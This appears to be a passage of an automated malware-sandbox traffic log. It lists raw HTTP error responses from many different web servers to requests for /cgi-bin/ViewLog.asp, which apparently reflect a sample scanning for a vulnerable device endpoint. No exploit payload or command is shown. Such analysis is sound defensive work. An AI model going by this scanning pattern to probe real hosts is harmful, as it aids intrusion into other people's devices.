        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nPerf/2.2.6 2021-05-08Connection: closeContent-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 3c 2f 70 3e 3c 70 3e 6e 50 65 72 66 53 65 72 76 65 72 20 76 32 2e 32 2e 36 20 32 30 32 31 2d 30 35 2d 30 38 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.<br /></p><p>nPerfServer v2.2.6 2021-05-08</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:13:14 GMTServer: Apache/2.4.27 (Win64) PHP/5.6.31Content-Length: 305Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 37 20 28 57 69 6e 36 34 29 20 50 48 50 2f 35 2e 36 2e 33 31 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.27 (Win64) PHP/5.6.31 Server at 192.168.0.14 Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Sat, 14 May 2022 00:12:46 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:47 GMTConnection: Close
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:25:38 GMTAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Sat, 14 May 2022 00:12:51 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 36 38 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:12:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 14 May 2022 00:12:57 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Sat, 14 May 2022 00:12:58 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Disposition: inlineContent-Security-Policy: default-src 'self'; style-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self'; img-src blob: data: about: 'self'; connect-src http: https: ws: wss:;Content-Type: text/plain; charset=utf-8Date: Sat, 14 May 2022 00:13:04 GMTServer: wfeVary: OriginX-Content-Type-Options: nosniffX-Digest: ngyMsVMtmxEWVqk05VINY8rEf6ZVWXCH8bjkKDxatNk=X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 May 2009 11:19:10 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 469Connection: closeServer: Jetty(9.4.44.v20210927)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 68 72 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 34 34 2e 76 32 30 32 31 30 39 32 37 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table><hr/><a href="https://eclipse.org/jetty">Powered by Jetty:// 9.4.44.v20210927</a><hr/></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0date: Sat, 14 May 2022 00:13:34 GMT
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 14 May 2022 00:13:12 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.0Date: Sat, 14 May 2022 00:13:12 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.0</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:11:53 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
